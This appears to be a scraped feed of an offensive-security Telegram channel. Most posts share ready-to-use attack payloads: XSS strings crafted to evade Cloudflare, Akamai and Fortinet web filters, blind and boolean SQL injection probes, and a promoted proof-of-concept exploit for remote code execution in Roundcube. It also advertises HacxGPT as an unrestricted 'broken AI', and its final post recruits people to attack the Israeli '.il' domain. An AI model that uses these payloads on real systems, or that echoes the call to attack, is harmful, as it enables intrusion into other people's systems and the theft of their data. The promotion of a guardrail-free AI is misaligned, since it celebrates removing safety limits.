XSS Payload Bypassing Cloudflare WAF on Next.js 14.1.4
Payload:
#XSS #Bypass
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Payload:
β>alert(154)</script><script/154=β;;;;;;;#XSS #Bypass
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯7β€4β‘3
Fortinet Fortigate XSS Bypass
Payload:
#XSS #Bypass
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Payload:
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>#XSS #Bypass
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π7π₯4β€3β‘3
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.
cd blackbird
pip install -r requirements.txt
Search by username
python blackbird.py --username username1 username2 username3Search by email
python blackbird.py --email email1@email.com email2@email.com email3@email.comExport results to PDF
python blackbird.py --email email1@email.com --pdfBlackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --aiBugCod3#Python #Osint #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
β€8π4π₯3β‘2
javascript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run
#js #extract #urls
β β β β β β β β β β
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url)
}); console.log(...new Set(urls))
#js #extract #urls
Please open Telegram to view this post
VIEW IN TELEGRAM
β€5β‘3π3π₯3β€βπ₯2
βββ(BugCod3γΏkali)-[~]
ββ$ sudo rm -rf *2024
βββ(BugCod3γΏkali)-[~]
ββ$ sudo mkdir 2025#Notification #NewYear
Please open Telegram to view this post
VIEW IN TELEGRAM
π12π₯5πΎ3π€1
CVE-2024-55591
A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection
π¬
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable
Affected Versions:
βͺοΈ FortiOS 7.0.0 through 7.0.16
βͺοΈ FortiProxy 7.0.0 through 7.0.19
βͺοΈ FortiProxy 7.2.0 through 7.2.12
πΈ Github
β¬οΈ Download
π
#Python #CVE #Vulnerable #Detection
β β β β β β β β β β
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable
Affected Versions:
BugCod3#Python #CVE #Vulnerable #Detection
Please open Telegram to view this post
VIEW IN TELEGRAM
π4β€3π₯3β‘2π1
HExHTTP
π¬
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.
π Features:
βͺοΈ Server Error response checking
βͺοΈ Localhost header response analysis
βͺοΈ Vhosts checking
βͺοΈ Methods response analysis
βͺοΈ HTTP Version analysis [Experimental]
βͺοΈ Cache Poisoning DoS (CPDoS) techniques
βͺοΈ Web cache poisoning
βͺοΈ Range poisoning/error (416 response error) [Experimental]
βͺοΈ Cookie Reflection
βͺοΈ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]
πΌ Installation:
π» Usage:
πΈ Github
β¬οΈ Download
π
#Python #HTTP #Headers #Analyze
β β β β β β β β β β
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.
pip install -r requirements.txt
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'
./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]
BugCod3#Python #HTTP #Headers #Analyze
Please open Telegram to view this post
VIEW IN TELEGRAM
β€4π₯3β‘2π2πΎ1
IDOR-Forge
IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
π¬ Description:
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.
π Features:
βͺοΈ Dynamic Payload Generation
βͺοΈ Multi-Parameter Scanning
βͺοΈ Support for Multiple HTTP Methods
βͺοΈ Concurrent Scanning
βͺοΈ Rate Limiting Detection
βͺοΈ Customizable Test Values
βͺοΈ Sensitive Data Detection
βͺοΈ Proxy Support
βͺοΈ Interactive GUI Mode
βͺοΈ Verbose Mode
βͺοΈ Output Options
βͺοΈ Custom Headers
βͺοΈ Session Handling
πΌ Installation:
π» Usage:
πΌ Interactive GUI Mode:
πΈ Github
β¬οΈ Download
π
#Python #Idor #Vulnerability #Tools
β β β β β β β β β β
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.
pip install -r requirements.txt
python IDOR-Forge.py
# CLI Basic Usage
python IDOR-Forge.py -u "https://example.com/api/resource?id=1"
# Advanced Usage
python IDOR-Forge.py -u "https://example.com/api/resource?id=1" -p -m GET --proxy "http://127.0.0.1:8080" -v -o results.csv --output-format csv
python IDOR-Forge.py -u http://example.com/resource?id=1 -p -m GET --output results.csv --output-format csv --test-values [100,200,300] --sensitive-keywords ["password", "email"]
python idor_hunter.py --interactive
BugCod3#Python #Idor #Vulnerability #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
β€7π4π₯3β‘2
π― Directory-Traversal-Payloads π―
List of Directory Traversal/LFI Payloads Scraped from the Internet
πΈ Github
β¬οΈ Download
π
#Payload #Directory
β β β β β β β β β β
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
List of Directory Traversal/LFI Payloads Scraped from the Internet
BugCod3#Payload #Directory
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯9β€6β‘2π2
WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability
π Category: web applications
π» Platform: php
πͺ Risk: Security Risk High π¨
π¬
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
π₯ CVE: CVE-2025-25163
β¬οΈ Download
π
#CVE #Exploit #PHP #WordPress
β β β β β β β β β β
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
BugCod3#CVE #Exploit #PHP #WordPress
Please open Telegram to view this post
VIEW IN TELEGRAM
β‘5β€4π3π₯3
Extracts URLs from OSINT Archives for Security Insights.
π¬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.
π Features:
βͺοΈ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
βͺοΈ Process multiple domains concurrently
βͺοΈ Filter results by file extensions or patterns
βͺοΈ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
βͺοΈ Multiple output formats (plain, JSON, CSV)
βͺοΈ Output to console or file
βͺοΈ Support for reading domains from stdin (pipeline integration)
βͺοΈ URL testing capabilities (status checking, link extraction)
πΌ Installation:
π» Usage:
Github
β¬οΈ Download
π
#Osint #URL #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π¬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.
π Features:
βͺοΈ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
βͺοΈ Process multiple domains concurrently
βͺοΈ Filter results by file extensions or patterns
βͺοΈ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
βͺοΈ Multiple output formats (plain, JSON, CSV)
βͺοΈ Output to console or file
βͺοΈ Support for reading domains from stdin (pipeline integration)
βͺοΈ URL testing capabilities (status checking, link extraction)
πΌ Installation:
cd urx
cargo build --release
π» Usage:
# Scan a single domain
urx example.com
# Scan multiple domains
urx example.com example.org
# Scan domains from a file
cat domains.txt | urx
Github
β¬οΈ Download
π
BugCod3#Osint #URL #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€10π5π₯2β‘1
CF-Hero
π¬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
π Feautures:
βͺοΈ DNS Reconnaissance
βͺοΈ Third-party Intelligence
βͺοΈ Advanced Features
πΌ Installation:
π» Usage:
Github
β¬οΈ Download
π
#GO #Origin #IP #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π¬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
π Feautures:
βͺοΈ DNS Reconnaissance
βͺοΈ Third-party Intelligence
βͺοΈ Advanced Features
πΌ Installation:
go install -v github.com/musana/cf-hero/cmd/cf-hero@latest
π» Usage:
# The most basic running command. It checks A and TXT records by default.
cat domains.txt | cf-hero
# or you can pass "f" parameter to it.
cf-hero -f domains.txt
# Use the censys parameter to include Shodan in the scan
cat domain.txt | cf-hero -censys
# Use the shodan parameter to include Shodan in the scan
cat domain.txt | cf-hero -shodan
# Use the securitytrails parameter to include Shodan in the scan
cat domain.txt | cf-hero -securitytrails
Github
β¬οΈ Download
π
BugCod3#GO #Origin #IP #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€7β‘3π2π₯2
Blind SQL Injection
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
#BugBounty #Payload #SQLi
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z#BugBounty #Payload #SQLi
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€7π₯4β‘2
Useful Wireshark Filters
#WireShark #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
#WireShark #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯5β‘2β€2
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯5β€3β‘1
This media is not supported in your browser
VIEW IN TELEGRAM
How to use Gobuster to brute-force directories!
$
dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
β¬οΈ Download
#GoBuster #Tips #Tools
ββββββββββ
π£ T.me/BugCod3
π£ T.me/Exploit_Forge
$
gobuster dir -u <target-URL> -w <wordlist>dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
β¬οΈ Download
#GoBuster #Tips #Tools
ββββββββββ
π£ T.me/BugCod3
π£ T.me/Exploit_Forge
π₯4β€3β‘1
WAF bypass for Akamai and Cloudflare
Payload:
#WAF #Akamai #Cloudflare
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>#WAF #Akamai #Cloudflare
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
1β€4β‘2π₯2
HacxGPT
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
π― Features:
βͺοΈ Powerful AI Conversations: all questions will be answered in goodflow.
βͺοΈ Broken AI: Can do anything you want !!
βοΈ Installation:
Github
β¬οΈ Download
π
#Ai #Hackers #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
π― Features:
βͺοΈ Powerful AI Conversations: all questions will be answered in goodflow.
βͺοΈ Broken AI: Can do anything you want !!
βοΈ Installation:
sudo apt-get update; apt-get upgrade -y
sudo apt-get install git wget python3 -y
cd Hacx-GPT
pip install -r requirements.txt
python3 main.py
Github
β¬οΈ Download
π
BugCod3#Ai #Hackers #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€4π₯3β‘2
CVE-2025-49113 - Roundcube Remote Code Execution
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
π¬ Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
π΄ββ οΈ Vulnerable Versions:
βͺοΈ 1.5.0 - 1.5.9
βͺοΈ 1.6.0 - 1.6.10
π Requirements:
βͺοΈ PHP 7.0 or higher
βͺοΈ cURL extension enabled
βͺοΈ Target running a vulnerable version of Roundcube
π» Usage:
πΌ Example:
Github
β¬οΈ Download
π
#CVE #PHP #RemoteCode
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
π¬ Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
π΄ββ οΈ Vulnerable Versions:
βͺοΈ 1.5.0 - 1.5.9
βͺοΈ 1.6.0 - 1.6.10
π Requirements:
βͺοΈ PHP 7.0 or higher
βͺοΈ cURL extension enabled
βͺοΈ Target running a vulnerable version of Roundcube
π» Usage:
php CVE-2025-49113.php <url> <username> <password> <command>
πΌ Example:
php CVE-2025-49113.php http://localhost/roundcube/ admin password "id"
Github
β¬οΈ Download
π
BugCod3#CVE #PHP #RemoteCode
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘4β€3π₯3
Hi π , friends who want to help us in attacking the
T.me/BugCod3BOT
.il domain address can provide their type of help in the bot below and contact us.T.me/BugCod3BOT
5π₯8